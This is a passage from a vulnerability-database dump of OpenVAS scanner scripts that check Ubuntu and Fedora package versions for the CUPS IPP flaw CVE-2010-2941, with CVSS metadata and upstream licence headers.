rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:31", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1012-1", "modified": "2017-12-01T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840531", "id": "OPENVAS:840531", "title": "Ubuntu Update for cups, cupsys vulnerability USN-1012-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1012_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for cups, cupsys vulnerability USN-1012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emmanuel Bouillon discovered that CUPS did not properly handle certain\n Internet Printing Protocol (IPP) packets. A remote attacker could use this\n flaw to cause a denial of service or possibly execute arbitrary code. In\n the default installation in Ubuntu 8.04 LTS and later, attackers would be\n isolated by the CUPS AppArmor profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1012-1\";\ntag_affected = \"cups, cupsys vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1012-1/\");\n script_id(840531);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1012-1\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Ubuntu Update for cups, cupsys vulnerability USN-1012-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:58:01", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-15T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862590", "id": "OPENVAS:862590", "title": "Fedora Update for cups FEDORA-2010-17641", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2010-17641\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cups on Fedora 14\";\ntag_insight = \"The Common UNIX Printing System provides a portable printing layer for\n UNIX® operating systems. It has been developed by Easy Software Products\n to promote a standard printing solution for all UNIX vendors and users.\n CUPS provides the System V and Berkeley command-line interfaces.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\");\n script_id(862590);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", 